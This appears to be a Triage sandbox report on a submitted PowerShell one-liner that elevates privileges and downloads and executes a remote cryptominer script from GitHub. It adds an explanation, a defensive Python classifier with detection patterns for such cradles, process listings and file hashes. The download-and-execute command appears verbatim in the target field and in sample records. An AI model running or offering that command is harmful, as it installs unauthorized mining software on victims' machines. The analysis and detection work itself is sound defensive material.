Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    133s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags
    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    27/06/2024, 01:39

General

  • Target

    http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
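The submitted target is not a URL but a PowerShell download cradle: `Start-Process PowerShell -Verb RunAs` requests a UAC elevation prompt, and `irm <url> | iex` fetches a script from GitHub and evaluates it in memory without writing it to disk. Because it was submitted as a URL, the sandbox prefixed it with `http://` and handed the whole string to iexplore.exe (see the Processes section below): no powershell.exe was spawned, and the Downloads section holds only CryptoAPI CryptnetUrlCache and Internet Explorer artifacts, not windows.ps1 or a miner. The Python below is an added example, not code from the Triage report or from the script author. It classifies process-creation records (the image/command-line pair that Sysmon Event ID 1 or Windows Security 4688 telemetry gives you) for this cradle pattern and separates a cradle actually interpreted by a PowerShell host from the same text merely passed as an argument to another process, which is what this run shows. The sample records are constructed from the report's Target and Processes sections plus two benign controls; the hostname example.invalid is a placeholder.

```python
"""Classify process-creation command lines for the PowerShell download cradle
seen in this report's target. Added example; not code from the Triage report.

Records are (image, command line) pairs, the shape of Sysmon Event ID 1 or
Windows Security 4688 telemetry. The samples below are constructed.
"""
import re
from dataclasses import dataclass, field

# Remote-fetch primitives that download text or files from a URL.
FETCH = re.compile(
    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)\b",
    re.I,
)
# Evaluators that execute the fetched text as code.
EVAL = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
# Start-Process -Verb RunAs asks for UAC elevation (an approval prompt).
ELEVATE = re.compile(r"-verb\s+runas\b", re.I)
URL = re.compile(r"https?://[^\s\"'|]+", re.I)
# Images that will actually interpret the command text.
PS_IMAGE = re.compile(r"(?:^|[\\/])(?:powershell|pwsh)\.exe$", re.I)
CMD_IMAGE = re.compile(r"(?:^|[\\/])cmd\.exe$", re.I)
PS_IN_CMDLINE = re.compile(r"\b(?:powershell|pwsh)\b", re.I)


@dataclass
class Verdict:
    image: str
    # one of: none | fetch_only | cradle_not_executed | cradle_executed
    category: str
    elevation: bool
    urls: list = field(default_factory=list)


def classify(image: str, cmdline: str) -> Verdict:
    """Return a Verdict for one process-creation record."""
    fetch = bool(FETCH.search(cmdline))
    evaluates = bool(EVAL.search(cmdline))
    # A cradle only runs when a PowerShell host (directly, or via cmd.exe)
    # interprets the text. The same text passed as an argument to a browser
    # is inert, which is what this sandbox run shows for iexplore.exe.
    host_runs_ps = bool(PS_IMAGE.search(image)) or (
        bool(CMD_IMAGE.search(image)) and bool(PS_IN_CMDLINE.search(cmdline))
    )
    if fetch and evaluates:
        category = "cradle_executed" if host_runs_ps else "cradle_not_executed"
    elif fetch:
        category = "fetch_only"
    else:
        category = "none"
    return Verdict(image, category, bool(ELEVATE.search(cmdline)), URL.findall(cmdline))


# The report's Target, verbatim.
TARGET = ("start-process PowerShell -verb runas irm "
          "https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex")

# Constructed records. 0: the target as it would appear if run from a PowerShell
# host. 1: what the report's Processes section actually shows (iexplore.exe given
# the text as a URL). 2 and 3: benign controls; example.invalid is a placeholder.
SAMPLES = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell.exe -Command "' + TARGET + '"'),
    (r"C:\Program Files\Internet Explorer\iexplore.exe",
     '"C:\\Program Files\\Internet Explorer\\iexplore.exe" "http://' + TARGET + '"'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoProfile -Command Get-Process"),
    (r"C:\Windows\System32\cmd.exe",
     'cmd.exe /c powershell -c "iwr https://example.invalid/tools.zip -OutFile tools.zip"'),
]


def triage(records=SAMPLES):
    """Classify every record; returns the list of Verdicts in input order."""
    return [classify(image, cmdline) for image, cmdline in records]


if __name__ == "__main__":
    for v in triage():
        flags = " +elevation" if v.elevation else ""
        print(f"{v.category:<22}{flags:<12} {v.image}")
        for u in v.urls:
            print(f"    url: {u}")
```

Run against this report's iexplore.exe record the verdict is `cradle_not_executed` with the elevation flag set, and the extracted URLs are `http://start-process` (the prefix the URL submission added) and the raw.githubusercontent.com script; to actually observe the miner script the sample would have to be resubmitted as a PowerShell command rather than as a URL.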

Malware Config

Signatures

  • Access Token Manipulation: Create Process with Token (1 TTP, 1 IoC)
  • Modifies Internet Explorer settings (1 TTP, 36 IoCs)
  • Suspicious use of FindShellTrayWindow (1 IoC)
  • Suspicious use of SetWindowsHookEx (6 IoCs)
  • Suspicious use of WriteProcessMemory (4 IoCs)

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" "http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex"
    PID: 1848
    • Access Token Manipulation: Create Process with Token
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (child of PID 1848)
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1848 CREDAT:275457 /prefetch:2
      PID: 1196
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    PID: 2188
  • C:\Windows\System32\control.exe
    "C:\Windows\System32\control.exe" SYSTEM
    PID: 2404
  • C:\Windows\SysWOW64\DllHost.exe
    C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
    PID: 1364

Network

MITRE ATT&CK Enterprise v15

Downloads

All entries are Internet Explorer and CryptoAPI artifacts: CryptnetUrlCache is CryptoAPI's cache of CRL, OCSP, AIA and CTL retrievals, and the MetaData file 94308059B57B3142E455B38A6EB92015 is listed ten times with different hashes, i.e. successive versions of the same file. The referenced windows.ps1 script does not appear.

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
    Filesize: 914B
    MD5: e4a68ac854ac5242460afd72481b2a44
    SHA1: df3c24f9bfd666761b268073fe06d1cc8d4f82a4
    SHA256: cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
    SHA512: 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize: 70KB
    MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
    SHA1: 1723be06719828dda65ad804298d0431f6aff976
    SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
    SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
    Filesize: 1KB
    MD5: a266bb7dcc38a562631361bbf61dd11b
    SHA1: 3b1efd3a66ea28b16697394703a72ca340a05bd5
    SHA256: df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
    SHA512: 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
    Filesize: 252B
    MD5: 336f38a3c469393c7b5e1bbef78154ea
    SHA1: 31a4c8e93c8610131429abf745a296a621b7476a
    SHA256: 9c50d1051613f2888c4b8b2b938b8c89b615a8c0a24276fde434546b7f71790b
    SHA512: cd089e1e306270ce391a2fd89f68e8dd7b578bcb210461f7b324e79bf9a976c17056d8938360319f7eceea3db96c332d568bdae99ad94a069c65e8128a048162

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 342B
    MD5: 7d314bb6f7a8b46693c793d7f24829c9
    SHA1: 39d14b7ab503136ece599633df8e14a99d2a26cb
    SHA256: ce06e3272b2a27716c7b0ac07839dfb47276245abe43c5b11ff953e5dcdc40e4
    SHA512: 134c5a0fdea24c3300fed791d5ec6c558dfd6172f52cd2f5404cc644e33f9d07458a6eaea9e223a9f29ecda0627c41149cecf3ef36fef932bd4fd8b46be7c979

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 342B
    MD5: 6c7c9e68d2777d54b613edd3455ebf77
    SHA1: 3ae939d1b01cbda284bf0fef63c7f6e272e9b797
    SHA256: e3bcb799f24f43f8ca5d597611e4c1288f6422aece6d082f5b920d5cf1ce73e4
    SHA512: 5692a43215f93045055fa81bb57473f88122e8677d3d3263e5aa3938bf1b89557519a602fa13c1bd6f2b288795fef33ce866bd7b234bde1154a5529a21acd8ff

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 342B
    MD5: 5298023add06cc028173dad42131eb51
    SHA1: 5532f13c180d5dc77d6dce588545b65e2aac44bf
    SHA256: 31dbddad3c1240d2b73327d41e72d8c400a36e27700e77ec2edac4eaf3a12b18
    SHA512: 4c2cf8845985c0cd79bd92cbad12e2b789fbbab8600af6ecd16c2a84a3df122a5ec3e7b60521d14a344dc21ce811db7287cf2063c84a54c35439781876f27027

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 342B
    MD5: c373839578f5357fb088088fb6ec7766
    SHA1: a29029ee738fcdba3c3727bdf7c5da25d3a7c4b3
    SHA256: d9b1c45f9ab818c88dbe363ba255dec59ebb3f9319e6d0913d83f0cd459a99ef
    SHA512: a4c1694c53ca64db11dbca51cbe4f7681dbb107064a71cee7f53a68c3911526714a38eedaeabf42ebf16296927ff10ec7fb525c28180b4603afb022ec83deeb3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 342B
    MD5: 53caf46b4a33efbd7c8bf428ad25a680
    SHA1: 87e54600e61590a5f0936f00b80f75f60f45faac
    SHA256: a26643a286630cb32064b7c76a5b3ed145425dc916bc0fb7222ff582773653e7
    SHA512: 08632031604719635eda624d82622603b07c2b15ddb328342c3260955950c4c506cb96ea018be3811c310a333d6f703c96efae4b6384981d193884cd7e61b870

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 342B
    MD5: 97bc235856496c08fb8b1974645a3957
    SHA1: 062c1fbce6bb2e6a0d55fa04aee5356822bb5740
    SHA256: 067ca7d7c971bfd5dd97fe804b57a3e5c6698fa8c00e96bf878dc0d3c8481469
    SHA512: bcb9c5303ee6cb4bef8c2915ff8bf80208f125ff30c6756be94b5e2e21f1d304b30e6bf93f0aafc1faefcbb8e3ef37e18b11badce2417dd45def2b46cb883729

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 342B
    MD5: 49843f3aae8300d7ce4e258805ccd553
    SHA1: 4d8cc49c214e57034a469e2573a4c9e578405bc5
    SHA256: a5c9cced7adc8ed41282f12cec845e2c664f6bd4291d54a0838d0f195cb62a58
    SHA512: 6711a39656e84750ada86f0c3d6a6e1e54e564d154efe0bc85acf90a7d4a16bd431cd166fdcc13489f042253483c2bf8b320886893a5207f9ecb7138d0403cbb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 342B
    MD5: 8e104dec98613b4fc556839a3f58d51a
    SHA1: 08c7d41658590a3594d8756665db98b8e0f9a6b0
    SHA256: d5457314d70db39ae4d7711aa59265a0807e0da7e9f8fcd4338a0cdcb885dc28
    SHA512: 3caf5aea3bd27f175f104d0cb6bed0374822b5f2fd762beb596e3ce28a55dca1125adf7fc22aa9a5a0b6b18a7da02066d4e7f4d412aca979729b43e91b5261a5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 342B
    MD5: a72ce72d1102ae14279ed046648708f1
    SHA1: ba26c27919520f632b5de246da1908b773cd719b
    SHA256: 3677a4499437b4fdcebbdc2f4eba8b1a45fb1e5ef56b5096434080617b46660c
    SHA512: 1607d672d93506e7a90e5a761e2d537f92bf661bd5c78df17f8ed196323b34e1bd66b847536d15d26eb514bf20eb06037d4c252142cbed5572adaa090a58ee09

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 342B
    MD5: 9f469956d0d4dff12a62574799594892
    SHA1: 98037de63366d1d5459f8f23e80bd958de6f427c
    SHA256: 9ad4122c6b46d379d4d1cbf6b56ced88bbb795b585230e3a629cf97693253f62
    SHA512: cc73ffa52c14069c4ddd62aaa5dd657dfaad51d3c9a11b3235364e593296ca2766d20c68a675f47ec67c48f7d8211e2c422dce9b9496d4e6d91674a62cbe6728

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
    Filesize: 242B
    MD5: 90668cb0013f40c6cc99adccea7039c8
    SHA1: 91e513ff0adba79c8486ab39338186a74c652824
    SHA256: 62f9892939e8cf650f5a94192a6be667bae98d37d0ec561638d264e2325ac831
    SHA512: b1a04860e723fc149571764ef69e2ddea682371d463c2f046e5cb090d8b10aa33d71a6e7262ecff0a7e815cf6e59cfc039bafb00362074ad1687a5836d2623e6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
    Filesize: 4KB
    MD5: da597791be3b6e732f0bc8b20e38ee62
    SHA1: 1125c45d285c360542027d7554a5c442288974de
    SHA256: 5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07
    SHA512: d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

  • C:\Users\Admin\AppData\Local\Temp\Tar3D83.tmp
    Filesize: 181KB
    MD5: 4ea6026cf93ec6338144661bf1202cd1
    SHA1: a1dec9044f750ad887935a01430bf49322fbdcb7
    SHA256: 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
    SHA512: 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b